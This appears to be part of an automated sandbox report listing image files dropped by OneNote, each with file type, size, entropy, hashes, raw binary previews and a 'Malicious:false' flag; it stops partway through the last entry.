                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11197
                                                                                                        Entropy (8bit):7.975073010774664
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                        MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                        SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                        SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                        SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):567
                                                                                                        Entropy (8bit):7.499095532051442
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                        MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                        SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                        SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                        SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):40884
                                                                                                        Entropy (8bit):7.545929039957292
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                        MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                        SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                        SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                        SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
